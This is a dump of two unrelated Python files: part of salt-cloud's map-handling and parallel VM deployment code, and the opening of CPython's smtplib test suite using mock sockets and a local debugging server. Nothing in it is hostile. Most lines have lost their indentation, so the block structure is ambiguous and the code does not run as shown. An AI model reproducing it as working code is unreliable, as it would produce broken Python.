Cloud.__init__(self, opts)
self.rendered_map = self.read()
def interpolated_map(self, query="list_nodes", cached=False):
rendered_map = self.read().copy()
interpolated_map = {}
for profile, mapped_vms in rendered_map.items():
names = set(mapped_vms)
if profile not in self.opts["profiles"]:
if "Errors" not in interpolated_map:
interpolated_map["Errors"] = {}
msg = (
"No provider for the mapped '{}' profile was found. "
"Skipped VMS: {}".format(profile, ", ".join(names))
)
log.info(msg)
interpolated_map["Errors"][profile] = msg
continue
matching = self.get_running_by_names(names, query, cached)
for alias, drivers in matching.items():
for driver, vms in drivers.items():
for vm_name, vm_details in vms.items():
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = vm_details
try:
names.remove(vm_name)
except KeyError:
# If it's not there, then our job is already done
pass
if not names:
continue
profile_details = self.opts["profiles"][profile]
alias, driver = profile_details["provider"].split(":")
for vm_name in names:
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = "Absent"
return interpolated_map
def delete_map(self, query=None):
query_map = self.interpolated_map(query=query)
for alias, drivers in query_map.copy().items():
if alias == "Errors":
continue
for driver, vms in drivers.copy().items():
for vm_name, vm_details in vms.copy().items():
if vm_details == "Absent":
query_map[alias][driver].pop(vm_name)
if not query_map[alias][driver]:
query_map[alias].pop(driver)
if not query_map[alias]:
query_map.pop(alias)
return query_map
def get_vmnames_by_action(self, action):
query_map = self.interpolated_map("list_nodes")
matching_states = {
"start": ["stopped"],
"stop": ["running", "active"],
"reboot": ["running", "active"],
}
vm_names = []
for alias, drivers in query_map.items():
for driver, vms in drivers.items():
for vm_name, vm_details in vms.items():
# Only certain actions are supported in this case. Those actions are the
# "global" salt-cloud actions defined in the "matching_states" dictionary above.
# If a more specific action is passed in, we shouldn't stack-trace - exit gracefully.
try:
state_action = matching_states[action]
except KeyError:
log.error(
"The use of '%s' as an action is not supported "
"in this context. Only 'start', 'stop', and "
"'reboot' are supported options.",
action,
)
raise SaltCloudException()
if (
vm_details != "Absent"
and vm_details["state"].lower() in state_action
):
vm_names.append(vm_name)
return vm_names
def read(self):
"""
Read in the specified map and return the map structure
"""
map_ = None
if self.opts.get("map", None) is None:
if self.opts.get("map_data", None) is None:
if self.opts.get("map_pillar", None) is None:
pass
elif self.opts.get("map_pillar") not in self.opts.get("maps"):
log.error(
"The specified map not found in pillar at " "'cloud:maps:%s'",
self.opts["map_pillar"],
)
raise SaltCloudNotFound()
else:
# 'map_pillar' is provided, try to use it
map_ = self.opts["maps"][self.opts.get("map_pillar")]
else:
# 'map_data' is provided, try to use it
map_ = self.opts["map_data"]
else:
# 'map' is provided, try to use it
local_minion_opts = copy.deepcopy(self.opts)
local_minion_opts["file_client"] = "local"
self.minion = salt.minion.MasterMinion(local_minion_opts)
if not os.path.isfile(self.opts["map"]):
if not (self.opts["map"]).startswith("salt://"):
log.error(
"The specified map file does not exist: '%s'", self.opts["map"]
)
raise SaltCloudNotFound()
if (self.opts["map"]).startswith("salt://"):
cached_map = self.minion.functions["cp.cache_file"](self.opts["map"])
else:
cached_map = self.opts["map"]
try:
renderer = self.opts.get("renderer", "jinja|yaml")
rend = salt.loader.render(self.opts, {})
blacklist = self.opts.get("renderer_blacklist")
whitelist = self.opts.get("renderer_whitelist")
map_ = compile_template(
cached_map, rend, renderer, blacklist, whitelist
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Rendering map %s failed, render error:\n%s",
self.opts["map"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {}
if "include" in map_:
map_ = salt.config.include_config(map_, self.opts["map"], verbose=False)
if not map_:
return {}
# Create expected data format if needed
for profile, mapped in map_.copy().items():
if isinstance(mapped, (list, tuple)):
entries = {}
for mapping in mapped:
if isinstance(mapping, str):
# Foo:
# - bar1
# - bar2
mapping = {mapping: None}
for name, overrides in mapping.items():
if overrides is None or isinstance(overrides, bool):
# Foo:
# - bar1:
# - bar2:
overrides = {}
try:
overrides.setdefault("name", name)
except AttributeError:
log.error(
"Cannot use 'name' as a minion id in a cloud map as it "
"is a reserved word. Please change 'name' to a different "
"minion id reference."
)
return {}
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, dict):
# Convert the dictionary mapping to a list of dictionaries
# Foo:
# bar1:
# grains:
# foo: bar
# bar2:
# grains:
# foo: bar
entries = {}
for name, overrides in mapped.items():
overrides.setdefault("name", name)
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, str):
# If it's a single string entry, make it iterable for the
# next step
mapped = [mapped]
map_[profile] = {}
for name in mapped:
map_[profile][name] = {"name": name}
return map_
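    # Illustrative sketch, not part of the original class: whatever shape the
    # map file uses (a plain list of names, a list of single-key dicts, or a
    # dict of overrides), read() normalizes each profile entry to a dict of
    # {minion_id: overrides}. Profile and minion names below are hypothetical.
    #
    #     # map file:                     # normalized by read():
    #     # web-profile:                  # {'web-profile': {
    #     #   - web1                      #     'web1': {'name': 'web1'},
    #     #   - web2:                     #     'web2': {'name': 'web2',
    #     #       minion:                 #              'minion': {'master': 'salt'}}}}
    #     #         master: salt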
def _has_loop(self, dmap, seen=None, val=None):
if seen is None:
for values in dmap["create"].values():
seen = []
try:
machines = values["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
else:
if val in seen:
return True
seen.append(val)
try:
machines = dmap["create"][val]["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
return False
def _calcdep(self, dmap, machine, data, level):
try:
deplist = data["requires"]
except KeyError:
return level
levels = []
for name in deplist:
try:
data = dmap["create"][name]
except KeyError:
try:
data = dmap["existing"][name]
except KeyError:
msg = "Missing dependency in cloud map"
log.error(msg)
raise SaltCloudException(msg)
levels.append(self._calcdep(dmap, name, data, level))
level = max(levels) + 1
return level
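    # Illustrative sketch, not part of the original class: for a dmap where
    # 'app1' requires 'db1' and 'db1' requires nothing, _calcdep assigns db1
    # level 0 and app1 level 1, and _has_loop returns False. Making db1
    # require app1 in turn would make _has_loop return True. Node names are
    # hypothetical.
    #
    #     dmap = {'create': {'db1': {},
    #                        'app1': {'requires': ['db1']}}}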
def map_data(self, cached=False):
"""
Create a data map of what to execute on
"""
ret = {"create": {}}
pmap = self.map_providers_parallel(cached=cached)
exist = set()
defined = set()
rendered_map = copy.deepcopy(self.rendered_map)
for profile_name, nodes in rendered_map.items():
if profile_name not in self.opts["profiles"]:
msg = (
"The required profile, '{}', defined in the map "
"does not exist. The defined nodes, {}, will not "
"be created.".format(
profile_name, ", ".join("'{}'".format(node) for node in nodes)
)
)
log.error(msg)
if "errors" not in ret:
ret["errors"] = {}
ret["errors"][profile_name] = msg
continue
profile_data = self.opts["profiles"].get(profile_name)
for nodename, overrides in nodes.items():
# Get associated provider data, in case something like size
# or image is specified in the provider file. See issue #32510.
if (
"provider" in overrides
and overrides["provider"] != profile_data["provider"]
):
alias, driver = overrides.get("provider").split(":")
else:
alias, driver = profile_data.get("provider").split(":")
provider_details = copy.deepcopy(self.opts["providers"][alias][driver])
del provider_details["profiles"]
# Update the provider details information with profile data
# Profile data and node overrides should override provider data, if defined.
# This keeps map file data definitions consistent with -p usage.
salt.utils.dictupdate.update(provider_details, profile_data)
nodedata = copy.deepcopy(provider_details)
# Update profile data with the map overrides
for setting in ("grains", "master", "minion", "volumes", "requires"):
deprecated = "map_{}".format(setting)
if deprecated in overrides:
log.warning(
"The use of '%s' on the '%s' mapping has "
"been deprecated. The preferred way now is to "
"just define '%s'. For now, salt-cloud will do "
"the proper thing and convert the deprecated "
"mapping into the preferred one.",
deprecated,
nodename,
setting,
)
overrides[setting] = overrides.pop(deprecated)
# merge minion grains from map file
if (
"minion" in overrides
and "minion" in nodedata
and "grains" in overrides["minion"]
and "grains" in nodedata["minion"]
):
nodedata["minion"]["grains"].update(overrides["minion"]["grains"])
del overrides["minion"]["grains"]
# remove the minion key if it is now an empty dict
if not overrides["minion"]:
del overrides["minion"]
nodedata = salt.utils.dictupdate.update(nodedata, overrides)
# Add the computed information to the return data
ret["create"][nodename] = nodedata
# Add the node name to the defined set
alias, driver = nodedata["provider"].split(":")
defined.add((alias, driver, nodename))
def get_matching_by_name(name):
matches = {}
for alias, drivers in pmap.items():
for driver, vms in drivers.items():
for vm_name, details in vms.items():
if vm_name == name and driver not in matches:
matches[driver] = details["state"]
return matches
for alias, drivers in pmap.items():
for driver, vms in drivers.items():
for name, details in vms.items():
exist.add((alias, driver, name))
if name not in ret["create"]:
continue
# The machine is set to be created. Does it already exist?
matching = get_matching_by_name(name)
if not matching:
continue
# A machine by the same name exists
for item in matching:
if name not in ret["create"]:
# Machine already removed
break
log.warning(
"'%s' already exists, removing from " "the create map.",
name,
)
if "existing" not in ret:
ret["existing"] = {}
ret["existing"][name] = ret["create"].pop(name)
if "hard" in self.opts and self.opts["hard"]:
if self.opts["enable_hard_maps"] is False:
raise SaltCloudSystemExit(
"The --hard map can be extremely dangerous to use, "
"and therefore must explicitly be enabled in the main "
"configuration file, by setting 'enable_hard_maps' "
"to True"
)
# Hard maps are enabled; look for the items to delete.
ret["destroy"] = exist.difference(defined)
return ret
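    # Illustrative sketch, not part of the original class: map_data returns a
    # structure along these lines (node and profile names hypothetical):
    #
    #     {'create':   {'web2': {...merged provider/profile/override data...}},
    #      'existing': {'web1': {...}},          # already running, moved out of 'create'
    #      'errors':   {'bad-profile': '...'},   # only when a mapped profile is undefined
    #      'destroy':  {(alias, driver, name)}}  # only with --hard and enable_hard_maps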
def run_map(self, dmap):
"""
Execute the contents of the VM map
"""
if self._has_loop(dmap):
msg = "Uh-oh, that cloud map has a dependency loop!"
log.error(msg)
raise SaltCloudException(msg)
# Go through the create list and calc dependencies
for key, val in dmap["create"].items():
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["create"][key]["level"] = level
try:
existing_list = dmap["existing"].items()
except KeyError:
existing_list = {}.items()
for key, val in existing_list:
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["existing"][key]["level"] = level
# Now sort the create list based on dependencies
create_list = sorted(dmap["create"].items(), key=lambda x: x[1]["level"])
output = {}
if self.opts["parallel"]:
parallel_data = []
master_name = None
master_minion_name = None
master_host = None
master_finger = None
try:
master_name, master_profile = next(
(
(name, profile)
for name, profile in create_list
if profile.get("make_master", False) is True
)
)
master_minion_name = master_name
log.debug("Creating new master '%s'", master_name)
if (
salt.config.get_cloud_config_value("deploy", master_profile, self.opts)
is False
):
raise SaltCloudSystemExit(
"Cannot proceed with 'make_master' when salt deployment "
"is disabled(ex: --no-deploy)."
)
# Generate the master keys
log.debug("Generating master keys for '%s'", master_profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", master_profile, self.opts)
)
master_profile["master_pub"] = pub
master_profile["master_pem"] = priv
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_temp_pub = salt.utils.files.mkstemp()
with salt.utils.files.fopen(master_temp_pub, "w") as mtp:
mtp.write(pub)
master_finger = salt.utils.crypt.pem_finger(
master_temp_pub, sum_type=self.opts["hash_type"]
)
os.unlink(master_temp_pub)
if master_profile.get("make_minion", True) is True:
master_profile.setdefault("minion", {})
if "id" in master_profile["minion"]:
master_minion_name = master_profile["minion"]["id"]
# Set this minion's master as local if the user has not set it
if "master" not in master_profile["minion"]:
master_profile["minion"]["master"] = "127.0.0.1"
if master_finger is not None:
master_profile["master_finger"] = master_finger
# Generate the minion keys to pre-seed the master:
for name, profile in create_list:
make_minion = salt.config.get_cloud_config_value(
"make_minion", profile, self.opts, default=True
)
if make_minion is False:
continue
log.debug("Generating minion keys for '%s'", profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", profile, self.opts)
)
profile["pub_key"] = pub
profile["priv_key"] = priv
# Store the minion's public key in order to be pre-seeded in
# the master
master_profile.setdefault("preseed_minion_keys", {})
master_profile["preseed_minion_keys"].update({name: pub})
local_master = False
if (
master_profile["minion"].get("local_master", False)
and master_profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
out = self.create(master_profile, local_master=local_master)
if not isinstance(out, dict):
log.debug("Master creation details is not a dictionary: {}".format(out))
elif "Errors" in out:
raise SaltCloudSystemExit(
"An error occurred while creating the master, not "
"continuing: {}".format(out["Errors"])
)
deploy_kwargs = (
self.opts.get("show_deploy_args", False) is True
and
# Get the needed data
out.get("deploy_kwargs", {})
or
# Strip the deploy_kwargs from the returned data since we don't
# want it shown in the console.
out.pop("deploy_kwargs", {})
)
master_host = deploy_kwargs.get(
"salt_host", deploy_kwargs.get("host", None)
)
if master_host is None:
raise SaltCloudSystemExit(
"Host for new master {} was not found, "
"aborting map".format(master_name)
)
output[master_name] = out
except StopIteration:
log.debug("No make_master found in map")
# Local master?
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_pub = os.path.join(self.opts["pki_dir"], "master.pub")
if os.path.isfile(master_pub):
master_finger = salt.utils.crypt.pem_finger(
master_pub, sum_type=self.opts["hash_type"]
)
opts = self.opts.copy()
if self.opts["parallel"]:
# Force display_ssh_output to be False since the console will
# need to be reset afterwards
log.info(
"Since parallel deployment is in use, ssh console output "
"is disabled. All ssh output will be logged though"
)
opts["display_ssh_output"] = False
local_master = master_name is None
for name, profile in create_list:
if name in (master_name, master_minion_name):
# Already deployed, it's the master's minion
continue
if (
"minion" in profile
and profile["minion"].get("local_master", False)
and profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
if master_finger is not None and local_master is False:
profile["master_finger"] = master_finger
if master_host is not None:
profile.setdefault("minion", {})
profile["minion"].setdefault("master", master_host)
if self.opts["parallel"]:
parallel_data.append(
{
"opts": opts,
"name": name,
"profile": profile,
"local_master": local_master,
}
)
continue
# Not deploying in parallel
try:
output[name] = self.create(profile, local_master=local_master)
                if (
                    self.opts.get("show_deploy_args", False) is False
                    and isinstance(output[name], dict)
                    and "deploy_kwargs" in output[name]
                ):
                    output[name].pop("deploy_kwargs", None)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
output[name] = {"Error": str(exc)}
for name in dmap.get("destroy", ()):
output[name] = self.destroy(name)
if self.opts["parallel"] and parallel_data:
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Cloud pool size: %s", pool_size)
output_multip = enter_mainloop(
_create_multiprocessing, parallel_data, pool_size=pool_size
)
# We have deployed in parallel, now do start action in
# correct order based on dependencies.
if self.opts["start_action"]:
actionlist = []
grp = -1
for key, val in groupby(dmap["create"].values(), lambda x: x["level"]):
actionlist.append([])
grp += 1
for item in val:
actionlist[grp].append(item["name"])
out = {}
for group in actionlist:
log.info(
"Running %s on %s", self.opts["start_action"], ", ".join(group)
)
with salt.client.get_local_client() as client:
out.update(
client.cmd(
",".join(group),
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
tgt_type="list",
)
)
for obj in output_multip:
next(iter(obj.values()))["ret"] = out[next(iter(obj.keys()))]
output.update(obj)
else:
for obj in output_multip:
output.update(obj)
return output
def init_pool_worker():
"""
    Make every worker ignore KeyboardInterrupt, since it will be handled by the
    parent process.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
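# Usage sketch (an assumption for illustration, not code from this module): a
# worker pool built for parallel map operations could install the handler via
# the 'initializer' hook so Ctrl-C is only processed by the parent, e.g.
#   pool = multiprocessing.Pool(processes=pool_size, initializer=init_pool_worker)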
def create_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the create is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
cloud = Cloud(parallel_data["opts"])
try:
output = cloud.create(
parallel_data["profile"], local_master=parallel_data["local_master"]
)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
if parallel_data["opts"].get("show_deploy_args", False) is False and isinstance(
output, dict
):
output.pop("deploy_kwargs", None)
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def destroy_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the destroy is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
clouds = salt.loader.clouds(parallel_data["opts"])
try:
fun = clouds["{}.destroy".format(parallel_data["driver"])]
with salt.utils.context.func_globals_inject(
fun,
__active_provider_name__=":".join(
[parallel_data["alias"], parallel_data["driver"]]
),
):
output = fun(parallel_data["name"])
except SaltCloudException as exc:
log.error(
"Failed to destroy %s. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def run_parallel_map_providers_query(data, queue=None):
"""
This function will be called from another process when building the
providers map.
"""
salt.utils.crypt.reinit_crypto()
cloud = Cloud(data["opts"])
try:
with salt.utils.context.func_globals_inject(
cloud.clouds[data["fun"]],
__active_provider_name__=":".join([data["alias"], data["driver"]]),
):
return (
data["alias"],
data["driver"],
salt.utils.data.simple_types_filter(cloud.clouds[data["fun"]]()),
)
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for running nodes: %s",
data["fun"],
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any nodes
return data["alias"], data["driver"], ()
# for pickle and multiprocessing, we can't use directly decorators
def _run_parallel_map_providers_query(*args, **kw):
return communicator(run_parallel_map_providers_query)(*args[0], **kw)
def _destroy_multiprocessing(*args, **kw):
return communicator(destroy_multiprocessing)(*args[0], **kw)
def _create_multiprocessing(*args, **kw):
return communicator(create_multiprocessing)(*args[0], **kw)
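# Why the wrappers above exist (illustrative reasoning, not new behaviour): the
# object returned by 'communicator(create_multiprocessing)' is built at call
# time and has no importable dotted name, so multiprocessing cannot pickle it
# for its workers. A plain module-level function such as
# '_create_multiprocessing' pickles as a reference to this module, is
# re-imported on the worker side, and applies the decorator there.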
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
def testQuoteData(self):
teststr = 'abc\n.jkl\rfoo\r\n..blue'
expected = 'abc\r\n..jkl\r\nfoo\r\n...blue'
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP(HOST, self.port, source_address=('127.0.0.1',
19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP('%s:%s' % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='testhost')
self.assertEqual(smtp.local_hostname, 'testhost')
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b'220 Hola mundo')
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b'220 Hola mundo')
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b'220 Hello world')
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile('^connect:', re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b'220 Hello world')
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile('^\\d{2}:\\d{2}:\\d{2}\\.\\d{6} connect: ',
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
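# The two events form a simple handshake (as used by setUp/tearDown below): the
# server thread sets serv_evt when it starts (and again when it exits), while
# the test sets client_evt to ask the polling loop to close the server.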
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
self.port = self.serv.socket.getsockname()[1]
serv_args = self.serv, self.serv_evt, self.client_evt
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
self.client_evt.set()
self.serv_evt.wait()
self.thread.join()
sys.stdout = self.old_stdout
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.quit()
def testSourceAddress(self):
port = support.find_unused_port()
try:
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3, source_address=('127.0.0.1', port))
self.assertEqual(smtp.source_address, ('127.0.0.1', port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = 250, b'OK'
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = 250, b'OK'
self.assertEqual(smtp.rset(), expected)
smtp.quit()
    def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = 250, b'\nSIZE 33554432\nHELP'
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = 502, b'EXPN not implemented'
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = (252, b'Cannot VRFY user, but will accept message ' +
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.helo()
expected = 503, b'Duplicate HELO/EHLO'
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.assertEqual(smtp.help(),
b'Supported commands: EHLO HELO MAIL ' +
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.sendmail('John', 'Sally', m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.sendmail('John', 'Sally', m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.sendmail('John', 'Sally', m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.sendmail('<>', 'Sally', m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: <>$', re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
        m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m)
time.sleep(0.01)
smtp.quit()
self.assertEqual(m['Bcc'],
'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: foo@bar.com$', re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
            to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: foo@bar.com$', re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
            to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
